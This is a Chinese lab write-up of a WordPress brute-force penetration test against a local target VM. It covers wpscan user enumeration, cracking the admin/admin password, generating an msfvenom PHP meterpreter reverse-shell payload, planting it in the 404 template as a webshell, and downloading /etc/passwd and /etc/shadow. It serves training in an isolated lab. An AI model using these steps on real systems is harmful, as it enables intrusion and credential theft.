渗透测试之 暴力破解 实验

  • 实验环境:

  • 攻击机:Kali 192.168.253.12 靶机: Ubuntu 192.168.253.20
  • 信息探测

  • 深入挖掘

  • 尝试访问敏感目录/secret/,进去之后发现有一个log in登录按钮,我们尝试登陆看看

  • 登录之后发现当前并没有找到站点文件

  • 将前面的域名更改为靶机的ip,可以成功进入(第一种方法)

  • 在攻击机上完成 ip地址的映射 ,修改 /etc/hosts文件(第二种方法)

  • 暴力破解

  • 使用wpscan 命令对用户名进行探测,查看是否存在admin这个用户名

  • 探测完毕,发现确有admin这个用户名

  • 删去最后一条set,增加一条set — set username admin
  • show options 查看要设置的选项

  • 等待run运行结束,发现爆破出来的密码为: admin

  • 使用 用户名:admin 密码:admin,进行登录

  • 首先要制作webshell

  • msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.253.12 lport=4444 -f raw

  • 打开wordpress后台: Appearance——》Editor——》404 Template

  • 将生成的payload复制到404模板中,之后点击上传
  • 开启监听

  • 使用浏览器访问该站点的404文件

  • 查看一些系统信息
  • sysinfo: 查看系统信息,shell:打开靶场的shell

  • 发现获取到的不是root权限,接下来进行提权操作
  • 利用返回的shell下载这两个文件 /etc/passwd /etc/shadow

  • 获取flag

  • 总结

  • 22
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值